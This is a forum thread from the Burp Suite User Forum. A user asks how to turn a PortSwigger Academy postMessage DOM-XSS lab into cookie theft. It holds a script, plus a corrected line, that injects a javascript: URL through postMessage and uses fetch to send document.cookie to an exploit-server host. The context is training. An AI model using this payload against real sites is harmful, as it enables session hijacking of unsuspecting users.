Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Use postmessage to steal cookies

Stefan | Last updated: Dec 03, 2022 10:22PM UTC

Hi I have been testing this lab. https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-xss-using-web-messages-and-json-parse but what but how could i use that to get the cookies? Not just an alert. i tried this script but its not working. The request appears in log on exploit server but no cookie. (in that lab the session is httpOnly=true), but if it would be false, would this work? I added my own cookies for test. but with no luck. <script> function send() { var frame = document.getElementById("myFrame"); var script ='javascript:fetch('https://exploit-MYLAB.exploit-server.net/log?c='+document.cookie, {\"mode\":\"no-cors\"})"; var message =JSON.stringify({"type":"load-channel","url":script}); frame.contentWindow.postMessage(message,"*"); } </script> <iframe src=https://labid.web-security-academy.net/ onload="send()" id="myFrame"></iframe>

Stefan | Last updated: Dec 03, 2022 10:28PM UTC

OK there is some errors in this script. should be var script ="javascript:fetch('https://exploit-MYLAB.exploit-server.net/log?c='+document.cookie, {\"mode\":\"no-cors\"})";

Stefan | Last updated: Dec 03, 2022 10:57PM UTC

I also tried to read cookies frim the iframe document.getElementById("myFrame").contentDocument.cookie Did not work.

Hannah, PortSwigger Agent | Last updated: Dec 06, 2022 10:14AM UTC

Hi Are you trying to solve the lab or to explore your learnings from the Web Academy? The target of this lab is to simply call the "print()" function.

Stefan | Last updated: Dec 06, 2022 05:53PM UTC

I solved the lab but wanted to take it further. Beyond print().. With eiher fetch or XMLHttpRequest to collaborator or exploit server. But i realised that this lab isnt made for That. Thers cors problems and httponly cookies.... What i wanted is a lab with postmessage exploit..

Hannah, PortSwigger Agent | Last updated: Dec 08, 2022 11:52AM UTC